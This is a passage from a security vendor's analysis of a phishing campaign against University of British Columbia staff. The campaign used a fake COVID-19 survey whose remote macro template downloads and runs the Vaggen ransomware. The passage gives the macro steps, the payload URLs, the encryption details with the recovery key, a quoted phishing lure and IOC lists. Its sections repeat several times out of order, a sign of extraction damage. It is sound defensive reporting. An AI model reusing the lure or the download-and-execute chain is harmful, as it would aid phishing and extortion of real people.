the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3060 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3061 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3062 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3063 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3064 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3065 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3066 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3067 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3068 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3069 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3070 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3071 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3072 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3073 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3074 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3075 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3076 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3077 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3078 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3079 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3080 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3081 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3082 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3083 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3084 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3085 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3086 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3087 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3088 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3089 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3090 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3091 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3092 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 3093 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of 